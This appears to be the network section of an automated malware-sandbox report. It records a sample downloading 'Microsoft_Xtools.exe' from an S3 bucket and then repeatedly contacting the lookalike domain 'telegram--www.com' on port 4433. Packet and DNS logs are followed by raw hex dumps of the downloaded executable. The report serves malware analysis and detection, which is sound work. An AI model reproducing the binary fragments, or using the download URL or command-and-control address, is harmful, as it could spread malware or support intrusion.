Mar 13, 2025 10:50:54.714869022 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.714879990 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.714912891 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.714936972 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.720796108 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.750860929 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.750880003 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.751000881 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.751014948 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.764991045 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.765086889 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.765105009 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.775511026 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.775561094 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.775593996 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.775605917 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.775641918 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.827370882 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.827394009 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.827462912 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.827472925 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.827524900 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.827524900 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.853101969 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.894419909 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.947458029 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.947468996 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.947592974 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.947603941 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.947613955 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.947999001 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.962332964 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.962352037 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.962538958 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.962548971 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.962605953 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.967325926 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.967398882 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.967401981 CET	443	49702	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.967504978 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.967786074 CET	49702	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.980284929 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.980346918 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:54.980437994 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.981344938 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:54.981373072 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:56.986272097 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:56.988529921 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:56.988559961 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.728194952 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.769521952 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:57.792169094 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.792180061 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.792292118 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.792325020 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:57.792362928 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.792371988 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.792397022 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:57.792397022 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:57.792443037 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:57.798938036 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.847635031 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:57.938628912 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.938642979 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.938682079 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.938724041 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.938781977 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:57.938793898 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.938827038 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:57.938827038 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:57.948446989 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.968508005 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.968573093 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.968602896 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:57.968621016 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.968662024 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:57.975270033 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.975342035 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:57.975357056 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.975374937 CET	443	49703	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:57.975456953 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:57.975817919 CET	49703	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:51:38.013819933 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:51:38.018553019 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:38.018682003 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:51:39.354665041 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:51:39.360168934 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:39.360215902 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:39.360225916 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:39.360244036 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:39.688472986 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:39.731462002 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:51:39.987199068 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:51:39.991966963 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:39.991978884 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:39.992006063 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:39.992037058 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:51:39.992070913 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:39.996721029 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:48.460877895 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:51:48.465622902 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:48.465712070 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:51:49.840203047 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:51:49.845027924 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:49.845046043 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:49.845061064 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:49.845118046 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:50.160083055 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:50.206976891 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:51:50.333725929 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:51:50.338640928 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:50.338661909 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:50.338682890 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:50.338730097 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:51:50.343451977 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:55.847898960 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:51:55.852524042 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:56.151055098 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:51:56.207005024 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:04.379353046 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:04.384108067 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:04.694298029 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:04.738356113 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:11.660181046 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:11.822240114 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:12.119873047 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:12.160214901 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:20.050863981 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:20.056061029 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:20.366009951 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:20.410176039 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:27.332245111 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:27.336977005 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:27.635261059 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:27.675863981 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:35.707166910 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:35.712229013 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:36.021753073 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:36.066622019 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:42.988497019 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:42.993742943 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:43.292387009 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:43.347702980 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:51.441555977 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:51.446449041 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:51.756428957 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:51.801001072 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:58.691520929 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:52:58.696249962 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:58.994833946 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:52:59.035334110 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:53:07.191824913 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:53:07.196698904 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:53:07.506603003 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:53:07.550806046 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:53:14.472879887 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:53:14.477725029 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:53:14.775782108 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:53:14.816555023 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:53:22.894857883 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:53:22.899530888 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:53:23.209670067 CET	4433	49707	206.238.115.224	192.168.2.6
Mar 13, 2025 10:53:23.254024982 CET	49707	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:53:30.972762108 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:53:30.972805977 CET	49705	4433	192.168.2.6	206.238.115.224
Mar 13, 2025 10:53:30.978590965 CET	4433	49705	206.238.115.224	192.168.2.6
Mar 13, 2025 10:53:30.978640079 CET	49705	4433	192.168.2.6	206.238.115.224

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 10:50:26.061898947 CET	55043	53	192.168.2.6	1.1.1.1
Mar 13, 2025 10:50:26.080857992 CET	53	55043	1.1.1.1	192.168.2.6
Mar 13, 2025 10:51:37.468478918 CET	50884	53	192.168.2.6	1.1.1.1
Mar 13, 2025 10:51:38.010221958 CET	53	50884	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 13, 2025 10:50:26.061898947 CET	192.168.2.6	1.1.1.1	0x56a5	Standard query (0)	priapic.s3.ap-east-1.amazonaws.com	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:51:37.468478918 CET	192.168.2.6	1.1.1.1	0x366	Standard query (0)	telegram--www.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 13, 2025 10:50:26.080857992 CET	1.1.1.1	192.168.2.6	0x56a5	No error (0)	priapic.s3.ap-east-1.amazonaws.com	s3-r-w.ap-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 10:50:26.080857992 CET	1.1.1.1	192.168.2.6	0x56a5	No error (0)	s3-r-w.ap-east-1.amazonaws.com		3.5.237.40	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:50:26.080857992 CET	1.1.1.1	192.168.2.6	0x56a5	No error (0)	s3-r-w.ap-east-1.amazonaws.com		52.95.162.66	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:51:38.010221958 CET	1.1.1.1	192.168.2.6	0x366	No error (0)	telegram--www.com		206.238.115.224	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

priapic.s3.ap-east-1.amazonaws.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49692	3.5.237.40	443	1784	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:50:28 UTC	104	OUT	GET /Microsoft_Xtools.exe HTTP/1.1 Host: priapic.s3.ap-east-1.amazonaws.com Connection: Keep-Alive
2025-03-13 09:50:29 UTC	446	IN	HTTP/1.1 200 OK x-amz-id-2: l8Lke8CjgBsDiIG7yKIzNjfjCTe0YYb5JldkwfTAKdeDG7AcwRk0Z8aRmW8UQoK/ItANNIMPn6a+xBhYgmxW45zeZRTR4XFO x-amz-request-id: NHB8HQJ8E0EWHNMC Date: Thu, 13 Mar 2025 09:50:29 GMT Last-Modified: Mon, 17 Feb 2025 08:54:30 GMT ETag: "58b4104495b166543884397497fe2243" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Content-Type: binary/octet-stream Content-Length: 350096 Server: AmazonS3 Connection: close
2025-03-13 09:50:29 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 42 56 45 de 06 37 2b 8d 06 37 2b 8d 06 37 2b 8d 4d 4f 28 8c 03 37 2b 8d 4d 4f 2e 8c 8d 37 2b 8d 4d 4f 2f 8c 0c 37 2b 8d 16 b3 28 8c 0f 37 2b 8d 16 b3 2f 8c 16 37 2b 8d 16 b3 2e 8c 2e 37 2b 8d 4d b2 2a 8c 05 37 2b 8d 4d 4f 2a 8c 04 37 2b 8d 06 37 2a 8d 5c 37 2b 8d 4d b2 2e 8c 04 37 2b 8d 4d b2 2b 8c 07 37 2b 8d 4d b2 d4 8d 07 37 2b 8d 4d b2 29 8c 07 37 2b 8d 52 69 63 68 06 37 2b Data Ascii: MZ@!L!This program cannot be run in DOS mode.$BVE7+7+7+MO(7+MO.7+MO/7+(7+/7+..7+M7+MO7+7*\7+M.7+M+7+M7+M)7+Rich7+
2025-03-13 09:50:29 UTC	578	IN	Data Raw: f8 8b 0a e8 2c 2e 00 00 90 48 8b cf e8 13 00 00 00 90 8b 0b e8 6f 2e 00 00 48 8b 5c 24 30 48 83 c4 20 5f c3 40 53 48 83 ec 30 48 8b d9 80 3d dc 42 01 00 00 0f 85 a9 00 00 00 b8 01 00 00 00 87 05 bf 42 01 00 48 8b 01 8b 08 85 c9 75 3e 48 8b 05 eb 33 01 00 48 8b 15 ac 42 01 00 48 3b d0 74 22 8b c8 83 e1 3f 48 33 c2 48 d3 c8 49 ba 70 28 d9 78 45 2e 01 99 45 33 c0 33 d2 33 c9 ff 15 e5 95 00 00 48 8d 0d 96 42 01 00 eb 0c 83 f9 01 75 0d 48 8d 0d a0 42 01 00 e8 4f 07 00 00 90 48 8b 03 83 38 00 75 13 48 8d 15 53 96 00 00 48 8d 0d 2c 96 00 00 e8 a7 fe ff ff 48 8d 15 50 96 00 00 48 8d 0d 41 96 00 00 e8 94 fe ff ff 48 8b 43 08 83 38 00 75 0e c6 05 34 42 01 00 01 48 8b 43 10 c6 00 01 48 83 c4 30 5b c3 e8 2a 09 00 00 90 cc 44 89 44 24 18 89 54 24 10 55 48 8b ec 48 83 Data Ascii: ,.Ho.H\$0H _@SH0H=BBHu>H3HBH;t"?H3HIp(xE.E333HBuHBOH8uHSH,HPHAHC8u4BHCH0[*DD$T$UHH
2025-03-13 09:50:29 UTC	16384	IN	Data Raw: 74 29 48 8d 15 6d a6 00 00 ff 15 8f 92 00 00 48 85 c0 74 12 49 ba 70 7b 5a 5e 9b 87 01 a2 8b cb ff 15 00 94 00 00 48 8b 4c 24 48 48 85 c9 74 07 ff 15 60 92 00 00 90 48 83 c4 30 5b c3 cc 48 89 0d 81 40 01 00 c3 ba 02 00 00 00 33 c9 44 8d 42 ff e9 58 fe ff ff 33 d2 33 c9 44 8d 42 01 e9 4b fe ff ff cc cc cc 45 33 c0 41 8d 50 02 e9 3c fe ff ff 48 83 ec 28 4c 8b 05 81 31 01 00 48 8b d1 4c 39 05 3f 40 01 00 75 21 41 8b c8 b8 40 00 00 00 83 e1 3f 2b c1 8a c8 48 d3 ca 49 33 d0 48 89 15 21 40 01 00 48 83 c4 28 c3 e8 27 07 00 00 cc cc cc 45 33 c0 33 d2 e9 f2 fd ff ff cc cc 48 83 ec 28 8d 81 00 c0 ff ff a9 ff 3f ff ff 75 12 81 f9 00 c0 00 00 74 0a 87 0d c5 42 01 00 33 c0 eb 15 e8 58 16 00 00 c7 00 16 00 00 00 e8 f5 13 00 00 b8 16 00 00 00 48 83 c4 28 c3 cc cc cc 48 Data Ascii: t)HmHtIp{Z^HL$HHt`H0[H@3DBX33DBKE3AP<H(L1HL9?@u!A@?+HI3H!@H('E33H(?utB3XH(H
2025-03-13 09:50:29 UTC	1024	IN	Data Raw: 8b f8 eb 02 33 ff 48 0f af dd 48 8b ce 48 8b d3 e8 49 15 00 00 48 8b f0 48 85 c0 74 16 48 3b fb 73 11 48 2b df 48 8d 0c 38 4c 8b c3 33 d2 e8 fb 40 00 00 48 8b c6 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 cc cc cc 48 83 ec 28 ff 15 56 53 00 00 48 85 c0 48 89 05 0c 09 01 00 0f 95 c0 48 83 c4 28 c3 48 83 25 fc 08 01 00 00 b0 01 c3 cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b f2 48 8b f9 48 3b ca 74 68 48 8b d9 48 8b 03 48 85 c0 74 14 49 ba 70 a2 5c 5c c4 9e 94 df ff 15 7b 53 00 00 84 c0 74 09 48 83 c3 10 48 3b de 75 db 48 3b de 74 3b 48 3b df 74 32 48 83 c3 f8 48 83 7b f8 00 74 1a 48 8b 03 48 85 c0 74 12 49 ba 70 3b 59 3e 75 a6 99 97 33 c9 ff 15 3f 53 00 00 48 83 eb 10 48 8d 43 08 48 3b c7 75 d2 32 c0 eb 02 b0 01 48 8b 5c 24 30 Data Ascii: 3HHHIHHtH;sH+H8L3@HH\$0Hl$8Ht$@H _H(VSHHH(H%H\$Ht$WH HHH;thHHHtIp\\{StHH;uH;t;H;t2HH{tHHtIp;Y>u3?SHHCH;u2H\$0
2025-03-13 09:50:29 UTC	16384	IN	Data Raw: 8c 00 00 00 83 fb 08 75 31 48 8b 05 c6 61 00 00 48 c1 e0 04 49 03 07 48 8b 0d c0 61 00 00 48 c1 e1 04 48 03 c8 48 89 44 24 28 48 3b c1 74 1d 48 83 60 08 00 48 83 c0 10 eb eb 48 8b 05 bd ed 00 00 48 89 07 eb 06 41 bc 10 09 00 00 45 84 f6 74 0a b9 03 00 00 00 e8 eb e7 ff ff 48 83 fe 01 75 07 33 c0 e9 99 fe ff ff 83 fb 08 75 23 e8 90 c9 ff ff 49 ba 70 33 d3 30 4f 1f 9c 8b 8b 50 10 8b cb 48 8b c6 4c 8b 05 9b 4f 00 00 41 ff d0 eb 18 49 ba 70 73 d7 50 49 86 c1 c6 8b cb 48 8b c6 48 8b 15 80 4f 00 00 ff d2 83 fb 0b 77 b4 41 0f a3 dc 73 ae 4d 89 6f 08 83 fb 08 75 a5 e8 41 c9 ff ff 8b 4c 24 78 89 48 10 eb 97 45 84 f6 74 08 8d 4e 03 e8 6f e7 ff ff b9 03 00 00 00 e8 85 bb ff ff 90 cc cc cc cc 48 89 5c 24 08 4c 89 4c 24 20 57 48 83 ec 20 49 8b f9 49 8b d8 48 8b 0a e8 Data Ascii: u1HaHIHaHHHD$(H;tH`HHHAEtHu3u#Ip30OPHLOAIpsPIHHOwAsMouAL$xHEtNoH\$LL$ WH IIH
2025-03-13 09:50:29 UTC	1024	IN	Data Raw: 2b c9 49 2b d1 4d 03 c1 49 81 f8 80 00 00 00 76 4b 66 66 66 66 66 0f 1f 84 00 00 00 00 00 66 0f 7f 01 66 0f 7f 41 10 66 0f 7f 41 20 66 0f 7f 41 30 66 0f 7f 41 40 66 0f 7f 41 50 66 0f 7f 41 60 66 0f 7f 41 70 48 81 c1 80 00 00 00 49 81 e8 80 00 00 00 49 81 f8 80 00 00 00 73 c2 4d 8d 48 0f 49 83 e1 f0 4d 8b d9 49 c1 eb 04 47 8b 9c 9a 28 5a 01 00 4d 03 da 41 ff e3 f3 42 0f 7f 44 09 80 f3 42 0f 7f 44 09 90 f3 42 0f 7f 44 09 a0 f3 42 0f 7f 44 09 b0 f3 42 0f 7f 44 09 c0 f3 42 0f 7f 44 09 d0 f3 42 0f 7f 44 09 e0 f3 42 0f 7f 44 01 f0 f3 0f 7f 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 66 66 0f 1f 84 00 00 00 00 00 cc cc cc cc cc cc 66 66 0f 1f 84 00 00 00 00 00 57 56 48 8b f9 48 8b f2 49 8b c8 f3 a4 5e 5f c3 48 8b c1 4c 8d 15 c6 2c ff ff 49 83 f8 0f 0f 87 0c Data Ascii: +I+MIvKfffffffAfA fA0fA@fAPfA`fApHIIsMHIMIG(ZMABDBDBDBDBDBDBDBDffffWVHHI^_HL,I
2025-03-13 09:50:29 UTC	1749	IN	Data Raw: 60 c5 fd e7 09 c5 fd e7 51 20 c5 fd e7 59 40 c5 fd e7 61 60 c5 fe 6f 8a 80 00 00 00 c5 fe 6f 92 a0 00 00 00 c5 fe 6f 9a c0 00 00 00 c5 fe 6f a2 e0 00 00 00 c5 fd e7 89 80 00 00 00 c5 fd e7 91 a0 00 00 00 c5 fd e7 99 c0 00 00 00 c5 fd e7 a1 e0 00 00 00 48 81 c1 00 01 00 00 48 81 c2 00 01 00 00 49 81 e8 00 01 00 00 49 81 f8 00 01 00 00 0f 83 78 ff ff ff 4d 8d 48 1f 49 83 e1 e0 4d 8b d9 49 c1 eb 05 47 8b 9c 9a b4 5a 01 00 4d 03 da 41 ff e3 c4 a1 7e 6f 8c 0a 00 ff ff ff c4 a1 7d e7 8c 09 00 ff ff ff c4 a1 7e 6f 8c 0a 20 ff ff ff c4 a1 7d e7 8c 09 20 ff ff ff c4 a1 7e 6f 8c 0a 40 ff ff ff c4 a1 7d e7 8c 09 40 ff ff ff c4 a1 7e 6f 8c 0a 60 ff ff ff c4 a1 7d e7 8c 09 60 ff ff ff c4 a1 7e 6f 4c 0a 80 c4 a1 7d e7 4c 09 80 c4 a1 7e 6f 4c 0a a0 c4 a1 7d e7 4c 09 a0 Data Ascii: `Q Y@a`ooooHHIIxMHIMIGZMA~o}~o } ~o@}@~o`}`~oL}L~oL}L
2025-03-13 09:50:29 UTC	9000	IN	Data Raw: c4 20 5d e9 d9 ba ff ff cc 40 55 48 83 ec 20 48 8b ea 48 8b 85 98 00 00 00 8b 08 48 83 c4 20 5d e9 4c 9d ff ff cc 40 55 48 83 ec 20 48 8b ea 48 8b 45 48 8b 08 48 83 c4 20 5d e9 7a 9f ff ff cc 40 55 48 83 ec 30 48 8b ea 8b 4d 60 48 83 c4 30 5d e9 63 9f ff ff cc 40 55 48 83 ec 20 48 8b ea b9 08 00 00 00 48 83 c4 20 5d e9 02 9d ff ff cc 40 55 48 83 ec 30 48 8b ea 48 8b 4d 40 48 83 c4 30 5d e9 5a ba ff ff cc 40 55 48 83 ec 20 48 8b ea 48 8b 01 81 38 05 00 00 c0 74 0c 81 38 1d 00 00 c0 74 04 33 c0 eb 05 b8 01 00 00 00 48 83 c4 20 5d c3 cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8b 01 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 48 83 c4 20 5d c3 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 74 01 00 00 00 00 00 e4 76 01 00 00 00 00 00 dc 71 01 00 00 00 Data Ascii: ]@UH HHH ]L@UH HHEHH ]z@UH0HM`H0]c@UH HH ]@UH0HHM@H0]Z@UH HH8t8t3H ]@UH HH38H ]tvq
